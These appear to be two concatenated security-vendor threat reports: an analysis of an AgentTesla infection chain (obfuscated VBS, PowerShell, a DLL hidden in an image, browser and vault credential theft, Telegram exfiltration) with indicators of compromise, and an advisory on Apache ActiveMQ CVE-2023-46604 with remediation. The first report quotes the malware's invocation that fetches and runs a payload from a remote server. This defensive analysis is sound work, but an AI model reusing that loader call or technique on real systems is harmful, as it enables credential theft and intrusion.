The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file there is a VBS script which is highly obfuscated, needing some heavy de-obfuscation to extract the next stage. The VBS on execution decodes the PowerShell code below:
2_Powershell

Figure 2: PowerShell Script

This PowerShell then downloads an image file Rump_vbs.jpg from the URL: "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".
3_PayloadImageFig_1

Figure 3: Image file embedded with DLL

The PowerShell retrieves a base64 encoded DotNet DLL file from the image file which is embedded between marker tags "BASE64_START" and "BASE64_END". This data is decoded and the DotNet assembly is then loaded into memory.

4_Image_Marker_tags

Figure 4: Image marker tags

After that, the PowerShell loads decoded Fiber.dll, which has the method "VAI" downloading and executing base64 encoded DotNet executable from the URL: "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod(‘VAI’).Invoke($null, [object[]] (‘txt.tkjnek/25.84.011[.]97//:ptth’ , ‘dfdfd’ , ‘dfdf’ , ‘dfdf’ , ‘dadsa’ , ‘de’ , ‘cu’))".

The downloaded Fiber.dll is again a heavily obfuscated DotNet assembly and has obfuscated API strings for process injection. Although it has a number of methods, a majority of the methods inside the file have junk code.

5_ProcessInjection_APIs

Figure 5: Obfuscated API names for Process Injection

AgentTesla

For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted on URL "hxxp://79.110.48[.]52/kenjkt.txt" has base64 encoded data. The decoded DotNet executable is the AgentTesla Payload. First, it enumerates for all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.

ChromiumBased_Browsers

Figure 6: Chromium-based browser’s data

Next, it appears that the malware has methods to search for Mozilla login data including the username and passwords in the victim’s machine.
7_Mozilla_Data

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored using Windows Vault GUIDs.
8_WinCredGUIDs

Figure 8: Win Vault GUIDS

AgentTesla does have keyboard hooking, clipboard hooking and logging functionality. Additionally, it has multiple APIs to retrieve keyboard layout and other details as well as information related to Windows and other system information.
1_WindowAPIs_Stealer

Figure 9: System information APIs

The stealer also has a list of sensitive strings or smart words, which contain a number of words leading to the private and sensitive information of an individual. In addition to this, it also checks for different email software, other common software for DB management and FTP connection and a few more well-known software.

10_TelegramBot

Figure 10: SmartWords and Telegram bot

Further, the data is exfiltrated via a telegram bot.

Evidence of detection by SonicWall’s RTDMI ™ engine can be seen below in the Capture ATP report for this file:
11_CaptureATP

Figure 11: RTDMI ATP report results

IOCs:
SHA:
9346658f9a881fa08edcf2d4071ae99f71ada25fbdcad0eaf7dfb204c5867a0d
0f6b26bc3cad49b68ab669c5d9def97db345f6c23b8d0ee9cff48262c2db0743
60304a8c52b10cd71bcc76f8a3ad0f0bbfe7395d2c64833400ac06d3c2c81d58
01ec36cf3833166dbad8aeef0c5683905b31956a5d5367ac52fa7aee2be9c64e

URLs:

  • hxxp://79.110.48[.]52/kenjkt.txt
  • hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937

Apache ActiveMQ Remote Code Execution (CVE_2023_46604)

/in /by

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Apache ActiveMQ allowing a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. The vulnerability is categorized as an Unbounded deserialization resulting in ActiveMQ being vulnerable to a remote code execution (RCE) attack. This issue has a CVSS base score of 10.0. CVE-2023-46604 is an unauthenticated deserialization vulnerability in ActiveMQ’s OpenWire transport connector, which is enabled by default and impacts both “Classic” and Artemis clients and brokers. Vulnerable software versions include:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Organizations still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-46604.

The overall CVSS 3.1 score is 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H).

Base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is low.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is proof of concept code.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview

Apache ActiveMQ is a widely used open-source message broker written in Java, known for its multi-protocol compatibility. It offers clients the flexibility of choosing from a variety of programming languages and platforms, with support for JavaScript, C, C++, Python, .Net and others.

An attacker connected to OpenWire TCP port 61616 can send an OpenWire packet to unmarshall an ExceptionResponse object instance. By supplying an arbitrary class name as well as an arbitrary string parameter to the BaseDataStreamMarshaller.createThrowable, the attacker will, have access to an arbitrary class to be instantiated with a single command string parameter.

Exploitation

At SonicWall Capture Labs Threat Research, we have recreated the PoC using Metasploit framework as demonstrated in Figure 1.

Before exploitation can occur, the following conditions must be true:

  • The attacker must have network access.
  • The attacker must send a manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter).
  • A class must be present on the installation in the classpath which can execute arbitrary code simply by instantiating it with a String parameter.

Figure 1 below demonstrates the following steps to exploit this vulnerability:

  • Create and start a vulnerable victim server.
  • Uses a Metasploit module to host the poc.xml file on the attacker’s server.
  • Finally, run the exploit by running Exploit.java.
  • Additionally using Shodan dork we can observe over 6000 vulnerable servers exposed on the internet.

Figure 1: SonicWall Capture Labs Threat Research Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:15940 – Apache ActiveMQ OpenWire Protocol Insecure Deserialization

Threat Graphs

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graphs below indicate an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 2: Threat Graph

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

If that’s not possible, users can mitigate the issue by validating the provided throwable class type via OpenWire marshallers that takes care of OpenWire commands. Further steps to mitigate are dictated on the official link.

Relevant Links